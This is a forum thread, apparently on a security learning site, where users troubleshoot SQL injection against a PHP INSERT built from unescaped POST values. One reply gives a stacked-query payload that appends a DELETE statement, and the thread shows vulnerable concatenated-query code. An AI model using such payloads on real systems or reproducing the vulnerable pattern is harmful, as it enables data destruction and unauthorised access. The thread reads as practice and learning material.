May 13, 2013 at 1:50 am #8438
I’m having trouble making SQL injection work with an INSERT statement and I’m not sure what I’m doing wrong. The PHP code for the SQL request looks like this:
mysql_query(“INSERT INTO txtcomment (id,comment) VALUES (‘” . $_POST . “‘,'” . $_POST. “‘)”)
Whenever I try to insert into the comment field, it doesn’t seem to work. If I attempt to insert into the ID field, it gives me the error “ERROR: Data truncated for column “id” at row 1″. It does that even if I just add a ‘ to the id parameter. If I put a character other than a number into the ID field, I get the error “ERROR: Out of range value adjusted for column “id” at row 1″.
When I attempt in the comment field, my whole query goes into the database, special characters and all. There doesn’t seem to be any escaping done in the PHP code, so I can’t tell why I can’t get it to work.
Any obvious mistakes I’m making?
May 13, 2013 at 9:48 am #52948notsosecureParticipant
May 13, 2013 at 12:10 pm #52949caissydParticipant
Is your ‘id’ column of type Integer? If it’s the case, your problem is your single quotes.
Change from (having single quotes around the ‘id’ column)
INSERT INTO txtcomment (id,comment) VALUES ('" . $_POST . "','" . $_POST. "')
to (no single quotes)
INSERT INTO txtcomment (id,comment) VALUES (" . $_POST . ",'" . $_POST. "')
You only put single quotes around CHAR, VARCHAR and DATE data types…
Let me know if it works!
May 13, 2013 at 2:37 pm #52950
Thanks for the info, guys. I’m gonna look into it this morning and I’ll post back with the outcome. The ID parameter is an integer, so I don’t know why quotes are around it, but it’s not my code. I’ll try changing the code and testing it to see the results, but I’d also like to get it working with how the code is now, if that’s even possible.
Either way, I’m gonna go at it a few more times this morning and see what I can find.
May 13, 2013 at 3:56 pm #52951
Still no luck. I removed the quotes from the ID parameter in the PHP code to test and was able to use some true/false statements to verify that I could inject, but as soon as I add the singe quotes back into the code, it’s no go.
Any time I provide anything other than an integer in the ID field, I get the “Data truncated” error. If I try to inject anything into the comment field, it gets put into the DB exactly as I typed it. I don’t see any escaping in the code, but can’t figure out why it won’t work with the single quotes on that field.
On a similar note, is it possible to inject into a query that gets provided to the mysql_num_rows function? I haven’t been able to get it working. I have some code like this and am wondering it’s exploitable as well:
$query=mysql_query(“SELECT * FROM products WHERE id=” . $id);
$number = mysql_num_rows($query);
Thanks for the help
May 15, 2013 at 12:27 pm #52952caissydParticipant
You know what eyenit0, I suggest you start MySQL Workbench (free!) and try to directly write SQL code there first (without going through PHP code). This way, you will be able to test SQL without the PHP layer.
For example, start with something like this:
INSERT INTO txtcomment (id,comment) VALUES (10, '');
-- Deleting the row containing the username 'bob' from the user table
-- Code to do this is: DELETE FROM user WHERE username='bob'
-- So the injection code would be: comment'); DELETE FROM user WHERE username='bob'; --
-- Note: There is a space at the very end of the SQL injection code!!!
INSERT INTO txtcomment (id,comment) VALUES (10, 'comment'); DELETE FROM user WHERE username='bob'; -- ');
As you can see:
comment'); DELETE FROM user WHERE username='bob'; --
Would be your SQLi code (including the space at the end)
Then, once it works in SQL Workbench, try to do the same thing through PHP. MySQL will often give you more meaningful error messages and you don’t have to worry about PHP…
Does this make sense?
May 15, 2013 at 8:21 pm #52953
Total sense. I should have done that earlier! That helped, along with turning on logging in MySQL to see the queries.
Unfortunately, I realized that magic_quotes is on in PHP(I thought I checked that earlier), so I don’t know if this is even exploitable, since the id parameter is quoted. If it weren’t, it would be fair game, but I don’t see a way out of this one without single quotes.
If I’m missing anything obvious, let me know!
January 4, 2021 at 6:17 am #178488
- You must be logged in to reply to this topic.